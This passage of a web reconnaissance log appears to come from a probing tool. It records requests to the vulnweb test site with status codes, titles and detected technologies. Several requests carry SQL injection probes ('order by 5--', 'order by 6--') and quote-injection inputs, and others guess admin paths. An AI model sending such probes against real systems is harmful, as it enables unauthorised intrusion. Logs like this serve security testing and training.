Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.\",\"time\":\"348.142799ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.335270525Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php a\",\"input\":\"http://testphp.vulnweb.com:80/login.php%20a\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php%20a\",\"time\":\"351.684331ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.336545186Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php'\",\"input\":\"http://testphp.vulnweb.com:80/login.php'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php'\",\"time\":\"352.413785ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.339819399Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=3\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=3\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=3\",\"time\":\"341.123868ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.341783863Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php\\\"\",\"input\":\"http://testphp.vulnweb.com:80/login.php%22\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php%22\",\"time\":\"356.809579ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.341787707Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php\\u0026fcbz=1\",\"input\":\"http://testphp.vulnweb.com:80/login.php\\u0026fcbz=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php\\u0026fcbz=1\",\"time\":\"346.516983ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.352878621Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php\",\"time\":\"345.272739ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.365020331Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+5--+\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+5--+\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2+order+by+5--+\",\"time\":\"357.673504ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":511,\"lines\":105,\"status_code\":200,\"content_length\":5311,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.364467295Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+6--+\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=2+order+by+6--+\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=2+order+by+6--+\",\"time\":\"351.225181ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":511,\"lines\":105,\"status_code\":200,\"content_length\":5311,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.365957421Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=4\",\"input\":\"http://testphp.vulnweb.com:80/listproducts.php?cat=4\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=4\",\"time\":\"356.948489ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:33.37095152Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/AJAX/index.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/AJAX/index.php\",\"time\":\"364.657208ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:35.186366352Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/style.css\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/style.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/style.css\",\"time\":\"352.388525ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:35.184096656Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/guestbook.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/guestbook.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/guestbook.php\",\"time\":\"339.559286ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:35.190625365Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/signup.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/signup.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/signup.php\",\"time\":\"348.627562ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:35.193917602Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/index.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/index.php\",\"time\":\"351.644901ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:35.196473534Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/privacy.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/privacy.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/privacy.php\",\"time\":\"350.015973ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:35.197508397Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/userinfo.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/userinfo.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/userinfo.php\",\"time\":\"343.43316ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:35.19767276Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/cart.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/cart.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/cart.php\",\"time\":\"352.951157ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:35.198692576Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/disclaimer.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/disclaimer.php\",\"time\":\"351.419579ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:35.202762778Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/login.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/login.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/login.php\",\"time\":\"347.877672ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:35.204523726Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/categories.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/categories.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/categories.php\",\"time\":\"349.186495ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:35.210113728Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/artists.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/AJAX/artists.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/AJAX/artists.php\",\"time\":\"349.369418ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.895341646Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/admin\",\"input\":\"http://testphp.vulnweb.com:80/login.php/admin\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/admin\",\"time\":\"348.19643ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.906993304Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/administrator\",\"input\":\"http://testphp.vulnweb.com:80/login.php/administrator\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/administrator\",\"time\":\"355.072627ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.905942184Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/guestbook.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/guestbook.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/guestbook.php\",\"time\":\"344.321448ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.911239131Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/adminstrator\",\"input\":\"http://testphp.vulnweb.com:80/login.php/adminstrator\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/adminstrator\",\"time\":\"350.903134ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.911656447Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/artists.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/artists.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/artists.php\",\"time\":\"342.141436ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.914006806Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/userinfo.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/userinfo.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/userinfo.php\",\"time\":\"361.536326ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.916461418Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/style.css\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/style.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/style.css\",\"time\":\"347.966027ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.918087209Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/index.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/index.php\",\"time\":\"343.324712ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.920501493Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/signup.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/signup.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/signup.php\",\"time\":\"347.915199ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.928673243Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/cart.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/cart.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/cart.php\",\"time\":\"348.248219ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.930034397Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/login.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/login.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/login.php\",\"time\":\"343.477197ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.929459795Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/disclaimer.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/disclaimer.php\",\"time\":\"347.823669ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.934637839Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/categories.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/categories.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/categories.php\",\"time\":\"347.893241ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:36.941631145Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/AJAX/privacy.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/AJAX/privacy.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/AJAX/privacy.php\",\"time\":\"349.522858ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.463023417Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/style.css\",\"input\":\"http://testphp.vulnweb.com:80/login.php/style.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/style.css\",\"time\":\"338.936319ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.472643995Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/signup.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/signup.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/signup.php\",\"time\":\"341.030412ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.479118172Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/categories.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/categories.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/categories.php\",\"time\":\"340.680974ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.480021859Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/login.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/login.php\",\"title\":\"login 